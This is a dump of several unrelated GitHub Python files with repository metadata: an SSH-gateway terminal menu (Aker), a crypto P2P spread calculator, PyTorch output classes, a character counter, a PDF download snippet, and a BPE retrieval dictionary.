+{"seq_id": "3054141243", "text": "__license__ = \"AGPLv3\"\n__author__ = 'Ahmed Nazmy '\n\n\nimport urwid\nimport aker\nimport signal\nimport logging\nimport os\nfrom popup import SimplePopupLauncher\n\n\nclass Listing(urwid.ListBox):\n \"\"\"\n Base class to handle listbox actions\n \"\"\"\n\n def __init__(self, items=None):\n self.search = Search()\n self.search.update_text(\"Type to search:\\n\")\n self._items = []\n if items is not None:\n for item in items:\n listitem = MenuItem(\"%s\" % (item))\n self._items.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n super(Listing, self).__init__(urwid.SimpleFocusListWalker(self._items))\n\n def updatelist(self, items):\n self.empty()\n for item in items:\n self.add_item(item)\n\n def add_item(self, item):\n listitem = MenuItem(\"%s\" % (item))\n self.body.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n\n def empty(self):\n del self.body[:] # clear listbox\n\n def get_selected(self):\n return self.focus\n\n def get_box(self):\n self.search.clear()\n return urwid.Frame(urwid.AttrWrap(self, 'body'), header=self.search)\n\n\nclass HostList(Listing):\n \"\"\"\n Class to handle hosts screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hosts=None):\n super(HostList, self).__init__(hosts)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n urwid.emit_signal(\n self,\n 'connect',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n if self.search.get_edit_text() == \"\":\n key = 'left'\n else:\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostList, self).keypress(size, key)\n\n\nclass HostGroupList(Listing):\n \"\"\"\n Class to handle hostgroups screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hostgroups=None):\n super(HostGroupList, self).__init__(hostgroups)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n # emit signal to call hostgroup_chosen_handler with MenuItem caption,\n # caption is group name showing on screen\n if self.focus is not None:\n urwid.emit_signal(\n self,\n 'group_chosen',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostGroupList, self).keypress(size, key)\n\n\nclass Header(urwid.Columns):\n def __init__(self, text):\n self.text = text\n self.header_widget = urwid.Text(self.text, align='left')\n self.popup = SimplePopupLauncher()\n self.popup_padding = urwid.Padding(self.popup, 'right', 20)\n self.popup_map = urwid.AttrMap(self.popup_padding, 'indicator')\n self.header_map = urwid.AttrMap(self.header_widget, 'head')\n super(Header, self).__init__([self.header_map, self.popup_map])\n\n def update_text(self, text):\n self.text = text\n self.header_map.original_widget.set_text(self.text)\n\n def popup_message(self, message):\n logging.debug(\"TUI: popup message is {0}\".format(message))\n self.popup.message = str(message)\n self.popup.open_pop_up()\n\n\nclass Footer(urwid.AttrMap):\n def __init__(self, text):\n self.footer_text = urwid.Text(text, 
align='center')\n super(Footer, self).__init__(self.footer_text, 'foot')\n\n\nclass Search(urwid.Edit):\n def __init__(self):\n super(Search, self).__init__()\n\n def update_text(self, caption):\n self.set_caption(caption)\n\n def clear(self):\n self.set_edit_text(\"\")\n\n\nclass MenuItem(urwid.Text):\n def __init__(self, caption):\n self.caption = caption\n urwid.Text.__init__(self, self.caption)\n\n def keypress(self, size, key):\n return key\n\n def selectable(self):\n return True\n\n def get_caption(self):\n return str(self.caption)\n\n\nclass Window(object):\n \"\"\"\n Where all the Tui magic happens,\n handles creating urwid widgets and\n user interactions\n \"\"\"\n\n def __init__(self, aker_core):\n self.aker = aker_core\n self.user = self.aker.user\n self.current_hostgroup = \"\"\n self.set_palette()\n\n def set_palette(self):\n self.palette = [\n ('body', 'black', 'light gray'), # Normal Text\n ('focus', 'light green', 'black', 'standout'), # Focus\n ('head', 'white', 'dark gray', 'standout'), # Header\n ('foot', 'light gray', 'dark gray'), # Footer Separator\n ('key', 'light green', 'dark gray', 'bold'),\n ('title', 'white', 'black', 'bold'),\n ('popup', 'white', 'dark red'),\n ('msg', 'yellow', 'dark gray'),\n ('SSH', 'dark blue', 'light gray', 'underline'),\n ('SSH_focus', 'light green', 'dark blue', 'standout')] # Focus\n\n def draw(self):\n self.header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \"]\n\n self.footer_text = [\n ('msg', \"Move:\"),\n ('key', \"Up\"), \",\",\n ('key', \"Down\"), \",\",\n ('key', \"Left\"), \",\",\n ('key', \"Right\"), \",\",\n ('key', \"PgUp\"), \",\",\n ('key', \"PgDn\"), \",\",\n ('msg', \"Select:\"),\n ('key', \"Enter\"), \" \",\n ('msg', \"Refresh:\"),\n ('key', \"F5\"), \" \",\n ('msg', \"Quit:\"),\n ('key', \"F9\"), \" \",\n ('msg', \"By:\"),\n ('key', \"Ahmed Nazmy\")]\n\n # Define widgets\n self.header = Header(self.header_text)\n self.footer = Footer(self.footer_text)\n self.hostgrouplist = HostGroupList(list(self.user.hostgroups.keys()))\n self.hostlist = HostList(list(self.user.allowed_ssh_hosts.keys()))\n self.topframe = urwid.Frame(\n self.hostgrouplist.get_box(),\n header=self.header,\n footer=self.footer)\n self.screen = urwid.raw_display.Screen()\n\n # Register signals\n urwid.register_signal(HostList, ['connect'])\n urwid.register_signal(HostGroupList, ['group_chosen'])\n\n # Connect signals\n urwid.connect_signal(\n self.hostgrouplist.search,\n 'change',\n self.group_search_handler)\n urwid.connect_signal(\n self.hostgrouplist,\n 'group_chosen',\n self.group_chosen_handler)\n urwid.connect_signal(\n self.hostlist.search,\n 'change',\n self.host_search_handler)\n urwid.connect_signal(\n self.hostlist,\n 'connect',\n self.host_chosen_handler)\n\n self.loop = urwid.MainLoop(\n self.topframe,\n palette=self.palette,\n unhandled_input=self._input_handler,\n screen=self.screen,\n pop_ups=True)\n\n def _input_handler(self, key):\n if not urwid.is_mouse_event(key):\n if key == 'f5':\n self.update_lists()\n elif key == 'f9':\n logging.info(\n \"TUI: User {0} logging out of Aker\".format(\n self.user.name))\n raise urwid.ExitMainLoop()\n elif key == 'left':\n # For now if its not hostgroup window left should bring it up\n if self.topframe.get_body() != self.hostgrouplist.get_box():\n self.current_hostgroup = \"\"\n self.hostlist.empty()\n self.header.update_text(self.header_text)\n self.topframe.set_body(self.hostgrouplist.get_box())\n else:\n logging.debug(\n \"TUI: User {0} 
unhandled input : {1}\".format(\n self.user.name, key))\n\n def group_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Group search handler called with text {0}\".format(search_text))\n matchinghostgroups = []\n for hostgroup in self.user.hostgroups.keys():\n if search_text in hostgroup:\n logging.debug(\n \"TUI: hostgroup {1} matches search text {0}\".format(\n search_text, hostgroup))\n matchinghostgroups.append(hostgroup)\n self.hostgrouplist.updatelist(matchinghostgroups)\n\n def host_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Host search handler called with text {0}\".format(search_text))\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n if search_text in host:\n logging.debug(\n \"TUI: host {1} matches search text {0}\".format(\n search_text, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n\n def group_chosen_handler(self, hostgroup):\n logging.debug(\n \"TUI: user %s chose hostgroup %s \" %\n (self.user.name, hostgroup))\n self.current_hostgroup = hostgroup\n self.hostlist.empty()\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n logging.debug(\n \"TUI: host {1} is in hostgroup {0}, adding\".format(\n hostgroup, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \",\n ('msg', \"HostGroup:\"),\n ('key', \"%s\" % self.current_hostgroup)]\n self.header.update_text(header_text)\n self.topframe.set_body(self.hostlist.get_box())\n\n def host_chosen_handler(self, choice):\n host = choice\n logging.debug(\"TUI: user %s chose server %s \" % (self.user.name, host))\n self.aker.init_connection(self.user.allowed_ssh_hosts[host])\n\n def update_lists(self):\n logging.info(\n \"TUI: Refreshing entries for user {0}\".format(\n self.aker.user.name))\n self.aker.user.refresh_allowed_hosts(False)\n self.hostgrouplist.empty()\n for hostgroup in self.user.hostgroups.keys():\n self.hostgrouplist.add_item(hostgroup)\n if self.current_hostgroup != \"\":\n self.hostlist.empty()\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n self.hostlist.add_item(host)\n self.header.popup_message(\"Entries Refreshed\")\n\n def start(self):\n logging.debug(\"TUI: tui started\")\n self.loop.run()\n\n def stop(self):\n logging.debug(u\"TUI: tui stopped\")\n raise urwid.ExitMainLoop()\n\n def pause(self):\n logging.debug(\"TUI: tui paused\")\n self.loop.screen.stop()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n\n def restore(self):\n logging.debug(\"TUI restored\")\n self.loop.screen.start()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n", "repo_name": "aker-gateway/Aker", "sub_path": "tui.py", "file_name": "tui.py", "file_ext": "py", "file_size_in_byte": 12044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 562, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urwid.ListBox", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urwid.AttrMap", "line_number": 26, "usage_type": "call"}, {"api_name": "urwid.SimpleFocusListWalker", "line_number": 30, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 40, "usage_type": "call"}, {"api_name": "urwid.Frame", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.AttrWrap", "line_number": 53, "usage_type": "call"}, 
{"api_name": "urwid.emit_signal", "line_number": 67, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 99, "usage_type": "call"}, {"api_name": "urwid.Columns", "line_number": 114, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 117, "usage_type": "call"}, {"api_name": "popup.SimplePopupLauncher", "line_number": 118, "usage_type": "call"}, {"api_name": "urwid.Padding", "line_number": 119, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 120, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 129, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 134, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 136, "usage_type": "call"}, {"api_name": "urwid.Edit", "line_number": 140, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 151, "usage_type": "attribute"}, {"api_name": "urwid.Text.__init__", "line_number": 154, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 154, "usage_type": "attribute"}, {"api_name": "urwid.Frame", "line_number": 220, "usage_type": "call"}, {"api_name": "urwid.raw_display.Screen", "line_number": 224, "usage_type": "call"}, {"api_name": "urwid.raw_display", "line_number": 224, "usage_type": "attribute"}, {"api_name": "urwid.register_signal", "line_number": 227, "usage_type": "call"}, {"api_name": "urwid.register_signal", "line_number": 228, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 231, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 235, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 239, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 243, "usage_type": "call"}, {"api_name": "urwid.MainLoop", "line_number": 248, "usage_type": "call"}, {"api_name": "urwid.is_mouse_event", "line_number": 256, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 260, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 272, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 277, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 282, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 301, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 308, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 324, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 328, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 342, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 346, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 347, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 350, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 352, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 352, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 355, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 357, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 357, "usage_type": "attribute"}]}
+{"seq_id": "38688017056", "text": "import time\nfrom prettytable import PrettyTable\n\nfrom coin_price import get_coin_price, get_p2p_price\nfrom check_prices import check_prices\nfrom table import create_table\n\nsumma = 5000\n\nstart = time.time()\n\np2pUSDTbuy = get_p2p_price('USDT', 'BUY', summa)\np2pBTCbuy = get_p2p_price('BTC', 'BUY', summa)\np2pBUSDbuy = get_p2p_price('BUSD', 'BUY', summa)\np2pBNBbuy = get_p2p_price('BNB', 'BUY', summa)\np2pETHbuy = get_p2p_price('ETH', 'BUY', summa)\np2pRUBbuy = get_p2p_price('RUB', 'BUY', summa)\n# p2pSHIBbuy = get_p2p_price('SHIB', 'BUY', summa)\n\np2pUSDTsell = get_p2p_price('USDT', 'SELL', summa)\np2pBTCsell = get_p2p_price('BTC', 'SELL', summa)\np2pBUSDsell = get_p2p_price('BUSD', 'SELL', summa)\np2pBNBsell = get_p2p_price('BNB', 'SELL', summa)\np2pETHsell = get_p2p_price('ETH', 'SELL', summa)\np2pRUBsell = get_p2p_price('RUB', 'SELL', summa)\n# p2pSHIBsell = get_p2p_price('SHIB', 'SELL', summa)\n\nspotUSDT = get_coin_price('USDT', 'RUB')\nspotBTC = get_coin_price('BTC', 'RUB')\nspotBUSD = get_coin_price('BUSD', 'RUB')\nspotBNB = get_coin_price('BNB', 'RUB')\nspotETH = get_coin_price('ETH', 'RUB')\n# spotSHIB = get_coin_price('SHIB', 'rub')\n\nth = ['COIN', '% input', 'p2p BUY', 'spot cost', 'p2p SELL', '% output']\ntd = [\n 'USDT', (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, p2pUSDTbuy, spotUSDT, p2pUSDTsell,\n (p2pUSDTsell - spotUSDT) / spotUSDT * 100,\n 'BTC', (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100, p2pBTCbuy, spotBTC, p2pBTCsell,\n (p2pBTCsell - spotBTC) / spotBTC * 100,\n 'BUSD', (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, p2pBUSDbuy, spotBUSD, p2pBUSDsell,\n (p2pBUSDsell - spotBUSD) / spotBUSD * 100,\n 'BNB', (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100, p2pBNBbuy, spotBNB, p2pBNBsell,\n (p2pBNBsell - spotBNB) / spotBNB * 100,\n 'ETH', (spotETH - p2pETHbuy) / p2pETHbuy * 100, p2pETHbuy, spotETH, p2pETHsell,\n (p2pETHsell - spotETH) / spotETH * 100\n]\n\ncolumns = len(th)\n\ntable = PrettyTable(th)\n\ntd_data = td[:]\n\nwhile td_data:\n table.add_row(td_data[:columns])\n td_data = td_data[columns:]\n\nprint(table) # Печатаем таблицу\n\nend = time.time()\n\nprint(\"The time of execution of above program is :\",\n (end - start) * 10 ** 3 / 1000, \"sec\")\n\ncoins = ['usdt', 'btc', 'busd', 'bnb', 'eth']\ncoins_buy = {'usdt': p2pUSDTbuy, 'btc': p2pBTCbuy, 'busd': p2pBUSDbuy, 'bnb': p2pBNBbuy, 'eth': p2pETHbuy}\ncoins_sell = {'usdt': p2pUSDTsell, 'btc': p2pBTCsell, 'busd': p2pBUSDsell, 'bnb': p2pBNBsell, 'eth': p2pETHsell}\ncoins_persents = {'usdt': (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, 'btc': (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100,\n 'busd': (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, 'bnb': (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100,\n 'eth': (spotETH - p2pETHbuy) / p2pETHbuy * 100}\nfor i in coins:\n for j in coins:\n if j != i:\n st = 10000\n st /= coins_buy[i]\n st /= get_coin_price(i, j)\n st *= coins_sell[j]\n if 0 < (st - 10000) / 10000 < 10:\n print(i + '/' + j)\n print((st - 10000) / 10000 * 100)\n\nrubs_coins = ['ADA', 'ALGO', 'ARB', 'ARPA', 'BNB', 'BTC', 'BUSD', 'DOT', 'ETH', 'LTC', 'MATIC', 'NEAR', 'NEO', 'SOL',\n 'XRP']\nbest = max(coins_persents, key=coins_persents.get)\nprint(best)\nfor i in rubs_coins:\n try:\n st = 10000\n st /= coins_buy[best]\n st /= get_coin_price(i, best)\n st *= get_coin_price(i, 'rub')\n print(i)\n print((st - 10000) / 10000 * 100)\n except:\n pass\n", "repo_name": "dez1ros/find_p2p_spred_binance", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3557, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 12, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 13, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 14, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 15, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 16, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 17, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 20, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 21, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 22, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 23, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 24, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 25, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 28, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 29, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 30, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 31, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 32, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 51, "usage_type": "call"}, {"api_name": "table.add_row", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 77, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 91, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "71191851367", "text": "import torch\n\n# output classes for bi-encoder and mm-encoder account for flexibility in case of additional byol or data2vec outputs\n\nclass DispatcherOutput:\n def __init__(\n self,\n student_input, \n teacher_inputs, \n align_fuse, \n apply_mask: bool, \n labels: torch.Tensor, \n output_modalities: dict, \n metric: str, \n num_classes: int,\n ) -> None:\n self.student_input = student_input\n self.teacher_inputs = teacher_inputs\n self.align_fuse = align_fuse\n self.apply_mask = apply_mask\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ModelOutput:\n def __init__(\n self,\n pooler_output: torch.Tensor,\n last_hidden_state: torch.Tensor,\n hidden_states: torch.Tensor,\n attentions: torch.Tensor,\n cross_attentions: torch.Tensor \n ) -> None:\n self.pooler_output = pooler_output\n self.last_hidden_state = last_hidden_state\n self.hidden_states = hidden_states\n self.attentions = attentions\n self.cross_attentions = cross_attentions\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n \n \nclass CriterionOutput:\n def __init__(\n self,\n total_loss: torch.Tensor,\n latent_loss: torch.Tensor = None,\n align_loss: torch.Tensor = None,\n ) -> None:\n self.total_loss = total_loss\n self.latent_loss = latent_loss\n self.align_loss = align_loss\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ForwardPassOutput:\n def __init__(\n self,\n student_output: ModelOutput = None,\n teacher_output: ModelOutput = None,\n align_fuse: dict = None,\n labels: torch.Tensor = None,\n output_modalities: dict = None,\n metric: str = None,\n num_classes: int = None,\n criterion_output: CriterionOutput = None,\n ) -> None:\n self.student_output = student_output\n self.teacher_output = teacher_output\n self.align_fuse = align_fuse\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes,\n self.criterion_output = criterion_output\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n ", "repo_name": "marcomoldovan/multimodal-self-distillation", "sub_path": "src/models/components/outputs.py", "file_name": "outputs.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 73, "usage_type": "attribute"}]}
+{"seq_id": "29647903572", "text": "word = 'podaj slowo lub zdanie:'\ndict1 = dict()\n\nfor sign in word:\n dict1[sign] = dict1.get(sign, 0) + 1\n\nfor znak, ilosc in dict1.items():\n print(f'{znak} -> {ilosc}')\n\n\nfrom collections import defaultdict\nzliczenia = defaultdict(int)\nfor znak in word:\n zliczenia[znak] += 1\nprint(\"333: \", zliczenia)", "repo_name": "marcinszymura/python_kurs", "sub_path": "day3/zadanie_get_slownik.py", "file_name": "zadanie_get_slownik.py", "file_ext": "py", "file_size_in_byte": 310, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "35013439440", "text": "import requests\n\n# Specify the URL of the PDF file in the repository\npdf_url = \"https://drive.google.com/file/d/1CLl2OruM9oPscyjaBhXiUD-dfdDNYDII/view?usp=sharing\"\n\n# Send a GET request to download the PDF file\nresponse = requests.get(pdf_url)\n\n# Check if the request was successful\nif response.status_code == 200:\n # Access the PDF content\n pdf_content = response.content\n # Your code to work with the PDF content goes here\n # For example, you can save it to a local file or process it further\nelse:\n print(\"Failed to retrieve the PDF file.\")\n", "repo_name": "harithabeduduru/mounika", "sub_path": "intern.py", "file_name": "intern.py", "file_ext": "py", "file_size_in_byte": 559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "40398157659", "text": "from typing import *\n\nimport torch\n\nfrom ncc.data import constants\nfrom ncc.data.dictionary import Dictionary\nfrom ncc.data.retrieval.word_bpe_dictionary import WordBpeDicionary\n\n\nclass HybridRetrievalDictionary(object):\n \"\"\"Hybrid retrieval dictionary, composed of subtoken and bpe dictionaries\"\"\"\n\n def __init__(self, subtoken_dict=None, bpetoken_dict=None):\n self.subtoken_dict = subtoken_dict\n self._subtoken_len = 0 if self.subtoken_dict is None else len(self.subtoken_dict)\n self.bpetoken_dict = bpetoken_dict\n self._bpetoken_len = 0 if self.bpetoken_dict is None else len(self.bpetoken_dict)\n\n def __len__(self):\n return self._subtoken_len + self._bpetoken_len\n\n def __getitem__(self, idx):\n if idx < self.__len__():\n if idx < self._subtoken_len:\n return self.subtoken_dict.symbols[idx]\n elif idx < self._subtoken_len + self._bpetoken_len:\n return self.bpetoken_dict.symbols[idx - self._bpetoken_len]\n return constants.UNK\n\n def __eq__(self, other):\n return (self.subtoken_dict is not None and self.subtoken_dict.indices == other.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and self.bpetoken_dict.indices == other.bpetoken_dict.indices)\n\n def __contains__(self, sym):\n return (self.subtoken_dict is not None and sym in self.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and sym in self.bpetoken_dict.indices)\n\n def unk(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk()\n else:\n return None\n\n @property\n def unk_word(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk_word\n else:\n return None\n\n def pad(self):\n if self.subtoken_dict:\n return self.subtoken_dict.pad()\n else:\n return None\n\n def eow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.eow()\n else:\n return None\n\n def sow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.sow()\n else:\n return None\n\n @classmethod\n def load(cls, f):\n subtoken_dict = Dictionary.load(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n bpetoken_dict = WordBpeDicionary.load(bpe_f)\n return cls(subtoken_dict, bpetoken_dict)\n\n def save(self, f):\n self.subtoken_dict.save(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n self.bpetoken_dict.save(bpe_f)\n\n def index(self, word):\n if word in self.subtoken_dict:\n subtokens = [word]\n else:\n subtokens = self.bpe_tokenize(word)\n subtoken_ids = []\n for token in subtokens:\n if token in self.subtoken_dict:\n subtoken_ids.append(self.subtoken_dict.index(token))\n elif token in self.bpetoken_dict:\n subtoken_ids.append(self.bpetoken_dict.index(token) + self._subtoken_len)\n else:\n subtoken_ids.append(self.subtoken_dict.unk())\n return subtoken_ids\n\n def encode_line(\n self,\n line,\n line_tokenizer,\n func_name,\n **kwargs\n ):\n words = line_tokenizer(line, func_name=func_name, min_func_len=kwargs.get('min_func_len', None)) \\\n if line_tokenizer is not None else line\n ids = []\n for i, word in enumerate(words):\n idx = self.index(word)\n ids.extend(idx)\n ids = torch.Tensor(ids).long()\n return ids\n\n def bpe_tokenize(self, word: str) -> List[str]:\n \"\"\" Tokenizes inside an unknown token using BPE \"\"\"\n end_idx = min([len(word), self.bpetoken_dict.ngram_max])\n sw_tokens = [self.bpetoken_dict.sow_word]\n start_idx = 0\n\n while start_idx < len(word):\n subword = word[start_idx:end_idx]\n if 
subword in self.bpetoken_dict:\n sw_tokens.append(subword)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n elif len(subword) == 1:\n sw_tokens.append(self.bpetoken_dict.unk_word)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n else:\n end_idx -= 1\n\n sw_tokens.append(self.bpetoken_dict.eow_word)\n return sw_tokens\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/data/retrieval/hybrid/hybrid_retrieval_dictionary.py", "file_name": "hybrid_retrieval_dictionary.py", "file_ext": "py", "file_size_in_byte": 4658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.data.constants.UNK", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.data.constants", "line_number": 28, "usage_type": "name"}, {"api_name": "ncc.data.dictionary.Dictionary.load", "line_number": 71, "usage_type": "call"}, {"api_name": "ncc.data.dictionary.Dictionary", "line_number": 71, "usage_type": "name"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary.load", "line_number": 74, "usage_type": "call"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 111, "usage_type": "call"}]}
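bpe_tokenize in the record above is a greedy longest-match segmenter between start-of-word/end-of-word markers; the same loop, stripped of the dictionary classes and run on a toy vocabulary (all names and the vocabulary are illustrative):

def greedy_bpe(word, vocab, ngram_max=4, sow='<w>', eow='</w>', unk='<unk>'):
    # Try the longest candidate substring first and shrink until it is in
    # the vocabulary; a single uncovered character becomes <unk>.
    tokens, start = [sow], 0
    end = min(len(word), ngram_max)
    while start < len(word):
        sub = word[start:end]
        if sub in vocab:
            tokens.append(sub)
            start, end = end, min(len(word), end + ngram_max)
        elif len(sub) == 1:
            tokens.append(unk)
            start, end = end, min(len(word), end + ngram_max)
        else:
            end -= 1
    return tokens + [eow]

print(greedy_bpe('unhappy', {'un', 'happ', 'y'}))   # ['<w>', 'un', 'happ', 'y', '</w>']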
